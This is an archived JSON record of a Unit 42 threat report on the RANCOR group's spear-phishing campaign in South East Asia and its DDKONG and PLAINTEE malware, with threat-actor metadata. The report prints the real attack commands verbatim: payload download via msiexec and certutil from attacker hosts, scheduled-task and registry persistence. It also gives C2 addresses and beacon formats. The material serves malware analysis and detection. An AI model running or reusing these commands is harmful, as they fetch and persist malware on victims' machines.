{
	"id": "6f7966ea-92c1-4f6d-ae50-07bac31807f9",
	"created_at": "2026-04-06T00:11:05.553497Z",
	"updated_at": "2026-04-10T03:37:50.032171Z",
	"deleted_at": null,
	"sha1_hash": "8c43c98c4d92b683088413f7f1c9be56e1e2a0f6",
	"title": "RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1946307,
	"plain_text": "RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families\r\nBy Brittany Barbehenn, Josh Grunzweig, Tom Lancaster\r\nPublished: 2018-06-26 · Archived: 2026-04-05 12:54:48 UTC\r\nThroughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused on South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted both in the distribution of the malware used and in the targets chosen. Based on these factors, Unit 42 believes the attackers behind these attacks are conducting their campaigns for espionage purposes.\r\nWe believe this group is previously unidentified and therefore we have dubbed it “RANCOR”. The Rancor group’s attacks use two primary malware families, which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign, and PLAINTEE appears to be a new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to:\r\nSingapore\r\nCambodia\r\nWe identified decoy files which indicate these attacks began with spear phishing messages, but we have not observed the actual messages. These decoys contain details from public news articles focused primarily on political news and events. Based on this, we believe the Rancor attackers were targeting political entities. 
Additionally, these decoy documents are hosted on legitimate websites, including a government website belonging to the Cambodian Government and, in at least one case, Facebook.\r\nThe malware and infrastructure used in these attacks fall into two distinct clusters, which we are labeling A and B, that are linked through their use of the PLAINTEE malware and several “softer” linkages.\r\nLinking the attacks\r\nBuilding on our previous research into the KHRAT Trojan, we have been monitoring KHRAT command and control domains. In February 2018, several KHRAT-associated domains began resolving to the IP address 89.46.222[.]97. We made this IP the center of our investigation.\r\nExamining passive DNS (pDNS) records from PassiveTotal revealed several domain names associated with this IP that mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address.\r\nThe following table depicts the two malware samples that are directly related to this IP address:\r\nSHA256 | Description | Connection to IP\r\n0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 | Loader | C2 facebook-apps.com (resolves to 89.46.222.97)\r\nc35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d | PLAINTEE | Hosted on 89.46.222.97\r\nDigging in further, the malware family we later named “PLAINTEE” appears to be quite unique, with only six samples present in our data set.\r\nApart from one sample (c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d), we were able to link all PLAINTEE samples together by the infrastructure they use. The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (see Appendix B for more detail on these). 
There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two.\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 1 of 10\r\nFigure 1 - Diagram showing the split of PLAINTEE samples across the two clusters of activity.\r\nOur investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia. Based on the use of the relatively unique PLAINTEE malware, the malware’s use of the same file paths in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker.\r\nDelivery \u0026 Loader mechanisms\r\nFor many of the samples we’ve been unable to identify how they were delivered to end victims; however, in three cases we were able to locate the files used to deliver the Trojan, which we found merited more investigation and are briefly discussed below.\r\nCluster A\r\nCase 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483\r\nIn our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware. 
Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors: embedding the main malicious code in an EXIF metadata property of the document.\r\nBy doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious code’s small footprint can help it evade automated detection mechanisms based on macro content.\r\nFigure 2 – The entire contents of the macro\r\nThe 'Company' field in this case contains the raw command that the attacker wishes to run, downloading and executing the next stage of the malware:\r\ncmd /c set /p=Set v=CreateObject(^\"Wscript.Shell^\"):v.Run ^\"msiexec /q /i http://199.247.6.253/ud^\",false,0 \u003cnul \u003e C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \u0026 schtasks /create /sc MINUTE /tn \"Windows System\" /tr \"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\" /mo 2 /F \u0026 schtasks /create /sc MINUTE /tn \"Windows System\" /tr \"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\" /mo 2 /RU SYSTEM\r\nCluster B\r\nCase 2: Delivery via HTA Loader - 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458\r\nIn this case the attackers sent an HTML Application file (.hta) to targets, most likely as an email attachment. 
When opened and then executed, the key components of the HTA file download and execute further malware from a remote URL and load a decoy image hosted externally (Figure 3).\r\nFigure 3 – The decoy image loaded when the .HTA file is executed.\r\nThe decoy in Figure 3 strongly suggests the attackers were conducting an attack against a political entity in Cambodia. The Cambodia National Rescue Party is a politically motivated opposition movement.\r\nCase 3: Delivery via DLL Loader - 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855\r\nWe identified three unique DLL loaders during this analysis. The loaders are extremely simple, with a single exported function, and are responsible for executing a single command. Exemplar commands are given below:\r\ncmd /c Echo CreateObject(\"WScript.Shell\").Run \"msiexec /q /i http:\\\\dlj40s.jdanief[.]xyz/images/word3.doc\",0 \u003e%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs\r\nschtasks /create /sc MINUTE /tn \"Windows Scheduled MaintenBa\" /tr \"wscript %userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs\" /mo 10 /F\r\ncmd /c certutil.exe -urlcache -split -f http:\\\\\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\\ProgramData\\1.pdf\u0026start C:\\ProgramData\\1.pdf\r\n
In the above commands, the malware is downloading and executing a payload and configuring it for persistent execution. In two of the three examples, the malware also downloads and opens a decoy PDF document hosted on a legitimate but compromised website. The decoy documents seen in these cases were related to Cambodian news articles; an example is shown in Figure 4 below.\r\nFigure 4 - 1.pdf decoy delivered by downloader\r\nThe decoy above discusses a recent event that took place against political party supporters in Cambodia, a similar theme to the decoy document observed in Figure 3.\r\nIt is worth noting that the third DLL mentioned attempts to download the decoy document from a government website. This same website was used previously in a KHRAT campaign targeting Cambodian citizens.\r\nAdditionally, two of the three DLL loaders were found to be hosted on this same compromised website, implying that it was likely compromised again in early 2018. The filenames for these two DLL loaders are as follows:\r\nActivity Schedule.pdf\r\nអ្នកនយោ បាយក្បត់លើ ក្បត (Translated from Khmer: Politicians betrayed on the betrayal)\r\nMalware Overview\r\nIn all cases where we were able to identify the final payloads used, the DDKONG or PLAINTEE malware families were used. We observed DDKONG in use between February 2017 and the present, while PLAINTEE is a newer addition, with the earliest known sample being observed in October 2017. 
Based on the data available, it’s unclear whether DDKONG is used by only one threat actor or by more than one.\r\nIn this section we’ll go over the capabilities and operation of these malware families.\r\nDDKONG\r\nFor the analysis below, we used the following file:\r\nSHA256 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0\r\nSHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a\r\nMD5 6fa5bcedaf124cdaccfa5548eed7f4b0\r\nCompile Time 2018-03-14 07:20:11 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 1 – DDKONG sample analyzed in full.\r\nThe malware in question is configured with the following three exported functions:\r\nServiceMain\r\nRundll32Call\r\nDllEntryPoint\r\nThe ServiceMain exported function indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe.\r\nThe Rundll32Call exported function begins by creating a named event called ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time: if this is the only instance of DDKong running, the malware continues; if it is not, it exits.\r\nDDKong attempts to decode an embedded configuration using a single-byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below.\r\nFigure 5 - Decoded configuration with fields highlighted\r\nAfter this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. 
In the beacon, no payload is provided, and as such the length of this packet is set to zero.\r\nFigure 6 – DDKONG beacon to remote C2\r\nAfter it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported ‘InitAction’ function. If 0x6 is specified, the malware is instructed to load the exported ‘KernelDllCmdAction’ function.\r\nPrior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. An example of this buffer at runtime is below:\r\n00000000: 43 3A 5C 55 73 65 72 73  5C 4D 53 5C 44 65 73 6B  C:\\Users\\MS\\Desk\r\n00000010: 74 6F 70 5C 52 53 2D 41  54 54 20 56 33 5C 50 6C  top\\RS-ATT V3\\Pl\r\n00000020: 75 67 69 6E 42 69 6E 00  00 00 00 00 00 00 00 00  uginBin.........\r\n[TRUNCATED]\r\n00000100: 00 00 00 00 43 3A 5C 55  73 65 72 73 5C 4D 53 5C  ....C:\\Users\\MS\\\r\n00000110: 44 65 73 6B 74 6F 70 5C  52 53 2D 41 54 54 20 56  Desktop\\RS-ATT V\r\n00000120: 33 5C 5A 43 6F 6E 66 69  67 00 00 00 00 00 00 00  3\\ZConfig.......\r\n[TRUNCATED]\r\n00000200: 00 00 00 00 00 00 00 00  00 40 00 00 F0 97 B5 01  .........@......\r\nAs we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original malware family’s name as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function. 
During runtime, the following plugin was identified:\r\nSHA256 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7\r\nSHA1 03defdda9397e7536cf39951246483a0339ccd35\r\nMD5 a5164c686c405734b7362bc6b02488cb\r\nCompile Time 2018-03-28 01:54:40 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 2 – Plugin downloaded during runtime for DDKong sample.\r\nThis plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.\r\nPLAINTEE\r\nIn total we have been able to find six samples of PLAINTEE, which, based on our analysis, seems to be used exclusively by the RANCOR attackers. PLAINTEE is unusual in that it uses a custom UDP protocol for its network communications. For this walkthrough, we use the following sample:\r\nSHA256 c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d\r\nSHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9\r\nMD5 d5679158937ce288837efe62bc1d9693\r\nCompile Time 2018-04-02 07:57:38 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 3 – PLAINTEE sample analyzed in full.\r\nThis sample is configured with three exported functions:\r\nAdd\r\nSub\r\nDllEntryPoint\r\nThe DLL expects the export named 'Add' to be used when initially loaded. 
When this function is executed, PLAINTEE executes the following command in a new process to add persistence:\r\ncmd.exe /c reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" /v \"Microsoft Audio\" /t REG_SZ /d \"%APPDATA%\\Network Service.exe\" \"[path_to_PLAINTEE]\",Add /f\r\nNext, the malware calls the ‘Sub’ function, which begins by creating a mutex named ‘microsoftfuckedupb’ to ensure only a single instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server.\r\nThe configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to decode the remainder of the data.\r\nDecoding this blob yields the following information, also found within the original binary:\r\nOffset | Description\r\n0x4 | C2 port (0x1f99 – 8089)\r\n0x8 | C2 host (45.76.176[.]236)\r\n0x10C | Flag used to identify the malware in network communications (default flag:4/2/2018 1:01:33 AM)\r\nTable 4 – Configuration stored in the malware.\r\nThe malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet via XOR. 
An example of the decoded beacon is shown in Figure 7.\r\nFigure 7 – PLAINTEE example beacon\r\nThe structure for this beacon is given in Table 5.\r\nOffset | Description\r\n0x0 | Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3)\r\n0x25 | Victim IP Address (192.168.180.154)\r\n0x45 | Command (0x66660001)\r\n0x49 | Length of payload (0x2f – 47)\r\n0x4d | Field 1 - Windows major version (0x6 – Windows Vista+)\r\n0x51 | Field 2 - Windows minor version (0x1 – Windows 7)\r\n0x55 | Field 3 - Unknown (0x20)\r\n0x59 | Payload (default flag:4/2/2018 1:01:33 AM)\r\nTable 5 – Beacon structure for PLAINTEE.\r\nThis beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After the initial beacon, there is a two-second delay between all other requests made. The response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads with different Command parameters, with the overall objective of loading and executing a new plugin that is to be received from the C2 server.\r\nDuring a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample. The retrieved plugin was as follows:\r\nSHA256 b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78\r\nSHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e\r\nMD5 7c65565dcf5b40bd8358472d032bc8fb\r\nCompile Time 2017-09-25 00:54:18 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 6 – PLAINTEE plugin observed in WildFire\r\nPLAINTEE expects the downloaded plugin to be a DLL with an export function of either 'shell' or 'file'. 
The plugin uses the same network protocol as PLAINTEE, and so we were able to trivially decode further commands that were sent. The following commands were observed:\r\ntasklist\r\nipconfig /all\r\nThe attacker performed these two commands 33 seconds apart. As automated commands are typically performed more quickly, this indicates that they may have been sent manually by the attacker.\r\nConclusions\r\nThe RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families. These families made use of custom network communication to load and execute various plugins hosted by the attackers. Notably, the PLAINTEE malware’s use of a custom UDP protocol is rare and worth considering when building heuristic detections for unknown malware. Palo Alto Networks will continue to monitor these actors, their malware, and their infrastructure going forward.\r\nPalo Alto Networks customers are protected against the threats discussed in this blog in the following ways:\r\nWildFire correctly identifies all samples discussed as malicious.\r\nTraps appropriately blocks the malware from executing.\r\nAutoFocus customers may track this threat via the KHRAT, DDKONG, PLAINTEE, and RANCOR tags.\r\nAdditional mitigations that could help to prevent attacks like these from succeeding in your environment include:\r\nChanging the default handler for “.hta” files in your environment so that they cannot be directly executed.\r\nAppendix A – PLAINTEE older variant\r\nOlder variants of PLAINTEE can be identified via the unique mutex created during runtime. 
At least three variants of PLAINTEE have been identified to date; however, the following two samples have additional unique differences:\r\nHash | Functions | M\r\nbcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e | helloworld, helloworld1, helloworld2, sqmAddTostream, DllEntryPoint | mi\r\n6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 | |\r\nThe following actions are performed with the additional functions:\r\nhelloworld - performs actions identical to the newer sample’s ‘Sub’ function\r\nhelloworld1 – accepts command-line arguments, performs a UAC bypass\r\nhelloworld2 – drops and compiles a mof file\r\nsqmAddTostream – expected to run initially by the malware, checks OS version and loads the malware with helloworld2\r\nAppendix B\r\n
Source: https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
	],
	"report_names": [
		"unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families"
	],
	"threat_actors": [
		{
			"id": "e8aee970-e31e-489f-81c2-c23cd52e255c",
			"created_at": "2023-01-06T13:46:38.763687Z",
			"updated_at": "2026-04-10T02:00:03.092181Z",
			"deleted_at": null,
			"main_name": "RANCOR",
			"aliases": [
				"Rancor Group",
				"G0075",
				"Rancor Taurus",
				"Rancor group",
				"Rancor"
			],
			"source_name": "MISPGALAXY:RANCOR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6d11e45c-4e31-4997-88f5-295b2564cfc6",
			"created_at": "2022-10-25T15:50:23.794721Z",
			"updated_at": "2026-04-10T02:00:05.358892Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"Rancor"
			],
			"source_name": "MITRE:Rancor",
			"tools": [
				"DDKONG",
				"PLAINTEE",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "416f8374-2b06-47e4-ba91-929b3f85d9bf",
			"created_at": "2022-10-25T16:07:24.093951Z",
			"updated_at": "2026-04-10T02:00:04.864244Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"G0075",
				"Rancor Group",
				"Rancor Taurus"
			],
			"source_name": "ETDA:Rancor",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"DDKONG",
				"Derusbi",
				"Dudell",
				"ExDudell",
				"KHRAT",
				"PLAINTEE",
				"RoyalRoad",
				"certutil",
				"certutil.exe",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434265,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.pdf",
		"text": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.txt",
		"img": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.jpg"
	}
}